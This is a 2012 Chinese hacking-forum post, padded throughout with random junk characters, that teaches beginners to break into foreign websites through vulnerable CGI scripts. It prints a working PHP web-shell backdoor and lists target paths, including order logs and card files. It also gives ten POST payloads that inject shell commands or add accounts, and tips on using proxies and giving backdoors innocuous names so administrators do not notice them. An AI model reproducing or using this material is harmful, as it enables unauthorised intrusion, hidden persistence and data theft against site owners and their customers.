中国网络渗透测试联盟
标题:
CGI 脚本入侵快速上手+脚本使用方法
[打印本页]
作者:
admin
时间:
2012-9-13 16:54
标题:
CGI 脚本入侵快速上手+脚本使用方法
CGI 脚本入侵快速上手+脚本使用方法
2 r/ `# `0 a, }7 H
大家好 我是bboyhip 只是一名菜菜的exploiter
+ {" |3 Z8 R$ G! K6 ^( q! W$ g9 w% P
很开心来到贵论坛
8 U+ ?9 v6 k6 v
这里让我感觉 很有技术交流的感觉
! z- Q7 u0 i5 [+ x+ s8 v
我会长长来玩的
0 j) u; E9 K$ K: n" [! f4 i6 c# p; \
前言:
) I) x& A* a2 c1 R
以下讲解针对欧美日本网站
F5 P7 Z& r% y/ |. T5 X
當我們在做滲透分析的時候 方法有很多
: F! Y5 |, o% K: s! X6 G
我门都知道 国外伺服器大多是linux 平台
, e# b, ~7 F0 a$ C
所以有很多网站程序有6成都会使用cgi 脚本来管理
( p8 L+ {4 ?2 Y4 X+ a1 e8 ~
目录为/cgi-bin/
" `3 b0 F' r: ?- c! {
! |' F: F5 U [3 r) I
只是个人在实务上一些经验
( U5 r# t! n& {/ [2 m* R: i
写的不好 请多多见谅喔
+ s5 B. s7 i" k# r; { s4 h
在这里我简单分为几个部份一定要會的
7 l4 P- p- F& C/ c6 N
讲解一下
: W+ H& ~6 K Z g( F
让没有基础的人很容易上手
3 n/ X6 o4 c5 L4 N
3 A. k2 X# L9 e$ j3 x6 |3 X& ~1 N
以下内容跟帖回复才能看到
( o. K5 D$ B( p6 G* ]# G, J
==============================
1 _: f8 L4 ^$ |2 Z
+ ]: ^- ~3 T0 Q- f9 a
第1部份: 何谓Shell?
+ c2 V# u& z$ v& d2 S1 I
Shell的中文, 可称为 "壳". Shell 是一个比较复杂的概念, 先看比较传统的解释:
' @ n4 t' S1 ]
A shell is the program which reads user input from the command line and executes actions based upon that input.
% H$ t+ X* b& q3 w" E$ E
意思是, 通过应用程式(shell), 用户输入指令, 由系统执行该指令.
1 o, V; Y- v" z
, Y: n/ P8 b0 d L
对於黑客来说, shell是後门, 是入侵/ 控制/ 浏览对方系统的程式/ 方法.
7 a( d4 i4 ]) v
要自行建立一个shell是十分困难的, 因为要先找漏洞, 找到後, 利用该漏洞来写入档案/ 後门. 大家都知道, 有些漏洞只可加码, 有些可读档, 但可以写档的不多. 在数年前, 有一个十分流行及易用的漏洞addpasswd.cgi, 可以写後门, 但时至今日, 绝大部份的addpasswd.cgi已经被删除.
" V+ b, N( J+ @2 a3 q
所以, 对於入门的exploiter来说, 先收集别人的後门, 多多练习, 然後再学习做自己的shell.
0 P% i* b0 V$ x' |2 s$ V2 j
$ }- M( ^) V: A3 @+ Z) Y% D. F& r$ \
第2部份: Unix 指令
5 b4 R9 k0 J- S& K7 u
以下是一些常见及重要的指令:
- r0 ]/ `5 L/ ~# c3 b- Q
pwd: 显示当前目录, 即是後门/程式所在的位置
% c% P0 V9 e0 y
如 /home/www/site.com/cgi-bin/
) N) l4 S0 k$ |* [3 r1 |5 F
ls: 列出档案 (-a 包含隐藏档; -l 包含详细资料).
^$ D' N5 |) K/ _ q5 f
ls -al :详细列出档案资料(当前目录)
# }2 Q* w6 \- {4 [+ c( Q5 z! G& @
ls /: 列出根目录
% _4 E' e. }; }; J9 I% w" f
ls /etc: 列出/etc的资料夹及档案
4 k8 { q: z( X1 b# |+ u
ls ../ -al: 详细列出上一层的资料夹及档案
! @$ [% V. z, e( a* j$ h- o" \
cat: 显示档案内容
3 b* z2 I8 U1 h, m1 A' ?
cat .htpasswd: 显示 .htpasswd 这个档案的内容(当前目录)
, e4 [" o# F( T8 \) K
cat /etc/passwd: 显示 /etc/passwd 这个档案的内容
/ c- Y. v+ O1 U' z( K3 y' g% g. r3 P
who: 显示谁login 至系统
1 L7 F5 q7 V& e! a
man: 显示指令用法
' j+ u) |+ Z6 Q0 h0 g4 D1 R. u& {
man ls: 显示ls这指令的用法
7 ^7 _( x2 o" Q* W
mkdir 建立目录
* r+ Z0 d) Z$ M; O
rmdir 删除目录
, F' _, E- |0 }1 `' q. k
mv 移动档案
6 k* t8 Y. R# L- c v
rm 删除档案
- P) ~7 w; @+ T: x) Z
3 ]1 z" C6 o$ j$ K$ Q9 ]
第3部份: Shell的使用
. X( [' p% a4 Y) d
例如:
$ f W5 j: u/ i" t" H9 h# S
http://site.com/refer.php
( i* V6 \1 ?1 v( E0 P+ b& x
这是我的後门, 原代码如下:
+ Z4 n5 A# G* d/ {
<Form Action="#" Method="POST">
5 A% R1 ~2 q% M M4 L- w
<Input type="text" name="cmd">
6 t1 E1 v J. ?+ }3 B
<Input type="Submit">
! h* S( J5 z+ U9 |( O( x: Y; P s
</Form>
* G2 k& q. o' `: @1 J U
<?php
4 d5 c6 G- r' W# S) x
$cmd = $_POST['cmd'];
+ h& {1 J! _9 g, t, z/ V* Q
$Output = shell_exec($cmd);
d# t) Z: o7 N# e4 r4 R
echo $Output;
( Z* _+ N5 Q- J, e$ ?( C6 x
?>
0 t2 \0 P5 x% X" w7 Z
输入pwd, 可得到绝对路径:
# h+ g7 D9 n k
/home/htdocs/users/jnesbitt/jnesbitt/nylonfantasies.com
) g, m$ _% L. `& E
9 [9 |' w. K5 C& S7 x$ _8 ~; Y
第4部份: 注意事项
. T B6 A8 D6 {$ I8 }
- 使用匿名代理, 保障自己
+ T+ W8 W |1 ?0 ~6 Q6 [) Q% r
- 不可恶意破坏, 或更改现有档案, 否则管理员发现了, 不但会删除後门, 可能会有追究行动
. ]2 S- V' U1 t3 L
- 加後门前, 必须了解目标系统是否支援. 例如, cgi後门, 应放在cgi-bin; 有些系统可能不支援 php後门等.
7 e4 `! t6 D- ^. M0 K- g( R
- 加後门前 (如 index.php), 先检查是否已存在该档案名称, 以免覆盖原有档案, 造成破坏.
3 N- V) v& u8 ^) G! g5 k- D0 ~
- 後门的名称, 不可使用hack, crack, exploit等字眼, 最好使用index, index1, log, login, refer, tmp, test, info等, 鱼目混珠,
) y; E& l" @( i. f8 b5 g
不容易被发现.
5 q$ S9 X D4 c" J u
- 将後门放在比较隐闭的地方 (例如 /cgi-bin/内, 有很多cgi档案, 比较少php档案)
* ?7 Z. `2 j3 X8 H+ ~: p6 \% N
针对网站的渗透分析方法太多了
/ X K% H0 M0 z) J/ g5 G$ ~( ~7 ~9 I/ p
这篇文章的重点是cgi 脚本攻击
7 b$ Q Q: G! M5 k0 h7 z
所以我用简单的叙述形容
) a: x2 \5 _; Z8 m9 L% a" D
开始讲解脚本入侵过程:
, D. M( P4 R0 E
在这里提供一些方法思路让大家学习一下
) e6 O+ b6 |( p
1 G; B; I/ L. A. O4 D
1.一开始对一个网站进行cgi漏洞扫描
( |% _2 [* w) _- v6 t. r7 m
我们需要的东西有
1 L* A0 D% Q) _9 s
扫洞工具 如:triton..等等
1 X+ F2 t7 {& A7 p* W6 `
E表
5 S+ N/ I; h {& y/ ~& P+ s6 ] g
如
' v3 Z/ n. ?" C; T5 S& T2 f
/cgi-bin/add-passwd.cgi
+ F$ |2 {7 @$ g9 Z8 W% H6 }# S
/WebShop/templates/cc.txt
9 J3 ^- l1 s/ N e' f( V
/Admin_files/order.log
" s. a9 ~+ \0 _6 A" Q9 \* S Z
/orders/mountain.cfg
2 o X+ c1 I/ M3 R! n
/cgi-sys/cart.pl
$ C' w( U- w, P( J4 y
/scripts/cart.pl
! f8 C0 W5 _- q. p- v
/htbin/cart.pl
$ d$ n8 D" l9 a3 h' }2 D
E表来源可以是网路收寻或是自己的0 day
: r* R* U) N( @
6 |3 ]1 e! _6 @0 J" b F% E
2.怎样确认扫到的洞 是真的还假的?
* j4 f3 c9 x) [( q! O% u% S
举例: target:
http://www.site.com/cgi-bin/add-passwd.cgi
5 {5 g( `- v! p+ q9 D
一般都是在IE里先看一下的,记住这个返回码哦
) {: o4 ?) R' _9 c' o+ o
ERROR:This script should be referenced with a METHOD of POST.
4 [* U; e. I$ G1 P0 y2 `4 y
没有返回一定是假的
/ w. P- m0 ~' t) c
3.重来来了 很多人都会问我
" ]+ L& q' d0 P0 C
他扫到很多洞 但是不会使用
) f9 m [6 K7 S% q& K
因为这些漏洞 使用的语法 称为post
/ C/ }; o8 g1 B5 r7 C
我们要找post 的方法很多
) K% E4 t) u$ U3 C0 }& F: o
可以是源代码分析 找出介质
4 h, T* U1 m4 o* X/ R9 M
或是用抓包工具 抓他的语法...等等
- o# }, W |3 o
! q9 V6 A' K( v( I, B+ l9 `5 G
以下我提供10个 cgi 洞以及使用方法post
4 F# D- f0 q# o0 B
让大家可以针对网站去做扫描
^) Z5 K8 V) U
/index.cgi
/ J4 V0 `* S& H7 i" |, v. S
wei=ren&gen=command
* e$ G/ {) L$ O+ F
/passmaster.cgi
; p1 ~; L1 R. _
Action=Add&Username=Username&Password=Password
0 P- o8 t/ d' ] U9 [% ?7 V
/accountcreate.cgi
" g' ^: l; R# g/ ?
username=username&password=password&ref1=|echo;ls|
$ q4 V2 l6 d( Q
/form.cgi
5 b, A/ ]- N9 J2 ~) T0 L
name=xxxx&email=email&subject=xxxx&response=|echo;ls|
! ~3 A; `2 h/ [4 B0 K, ^
/addusr.pl
" d- d! N8 W+ _3 N u9 n
/cgi-bin/EuroDebit/addusr.pl
3 B* d- G' a/ w
user=username&pass=Password&confirm=Password
3 o4 i' @, |9 |( X; o
/ccbill-local.asp
0 x4 M1 T4 @; f& M, o
post_values=username:password
O7 ]" B9 n. k2 q
/count.cgi
. n9 N4 L. Z# @ i7 g
pinfile=|echo;ls -la;exit|
3 q1 }! [0 f' f; v `- i; B6 v
/recon.cgi
+ N. R* J0 k- n. o. A7 y3 w
/recon.cgi?search
; w) n3 i+ a4 P8 I1 w
searchoption=1&searchfor=|echo;ls -al;exit|
) M8 Q, J0 R% k9 g
/verotelrum.pl
( Q5 E4 }( g7 V1 K# z# _
vercode=username:password:dseegsow:add:amount<&30>
8 B: q) l/ o/ s+ s% f, j; O! q
/af.cgi_browser_out=|echo;ls -la;exit;|
+ b: J# i% P/ p4 t( n
8 x0 y& @! N6 M8 I$ Q
今天就讲到这 感谢大家支持
; X2 m& P' L1 } P$ }; @/ J" Z0 `
欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/)
Powered by Discuz! X3.2